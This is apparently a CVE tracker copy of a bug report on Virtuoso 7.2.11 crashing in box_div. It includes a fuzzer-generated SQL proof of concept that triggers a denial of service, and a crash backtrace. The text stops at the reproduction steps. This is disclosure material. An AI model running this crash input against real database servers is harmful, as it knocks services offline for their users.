Headline

CVE-2023-48948: Fuzzer: Virtuoso 7.2.11 crashed at box_div · Issue #1176 · openlink/virtuoso-opensource

An issue in the box_div function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

11 months ago

CVE

Open in Source

#sql #dos #docker

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INTEGER NOT NULL PRIMARY KEY ) ; INSERT INTO v0 VALUES ( 95 ) ; INSERT INTO v0 VALUES ( ( SELECT ( -1 , -1 ) * ( 31 , 84 ) FROM v0 WHERE v1 BETWEEN ‘x’ AND ‘x’ OR EXISTS ( SELECT v1 FROM v0 WHERE v1 NOT IN ( SELECT 20 FROM v0 WHERE ( v1 > 2147483647 AND v1 < 271514.000000 ) ) ) ) ) ; INSERT INTO v0 SELECT v1 + v1 + v1 FROM v0 ORDER BY v1 ; INSERT INTO v0 VALUES ( ( SELECT ( 34 , 16 ) * ( 41 , -128 ) FROM v0 WHERE v1 BETWEEN ‘x’ AND ‘x’ OR EXISTS ( SELECT v1 FROM v0 WHERE v1 + v1 * 24 / 50820962.000000 - 0 / 86183090.000000 IN ( SELECT DISTINCT v1 FROM v0 WHERE ‘x’ OR ( ( ( v1 / 0 ) ) [ 35 ] ) * 16 BETWEEN ‘x’ AND ‘x’ GROUP BY v1 , v1 ) ) ) ) ;

backtrace:

#0 0xc210f3 (box_div+0x83) #1 0x754f4e (code_vec_run_v+0x1c9e) #2 0x7b86bb (end_node_input+0x13b) #3 0x7af05e (qn_input+0x3ce) #4 0x7af78f (qn_ts_send_output+0x23f) #5 0x7b509e (table_source_input+0x16ee) #6 0x7af05e (qn_input+0x3ce) #7 0x44c979 (chash_fill_input+0x589) #8 0x5370af (hash_fill_node_input+0xef) #9 0x7af05e (qn_input+0x3ce) #10 0x7af4c6 (qn_send_output+0x236) #11 0x8214bd (set_ctr_vec_input+0x99d) #12 0x7af05e (qn_input+0x3ce) #13 0x751d38 (subq_next+0x258) #14 0x8201a2 (ins_vec_subq+0x2a2) #15 0x753c6b (code_vec_run_v+0x9bb) #16 0x7b8737 (end_node_input+0x1b7) #17 0x7af05e (qn_input+0x3ce) #18 0x7c1be9 (qr_dml_array_exec+0x839) #19 0x7ce602 (sf_sql_execute+0x15d2) #20 0x7cecde (sf_sql_execute_w+0x17e) #21 0x7d799d (sf_sql_execute_wrapper+0x3d) #22 0xe214bc (future_wrapper+0x3fc) #23 0xe28dbe (_thread_boot+0x11e) #24 0x7ff8b497a609 (start_thread+0xd9) #25 0x7ff8b474a133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):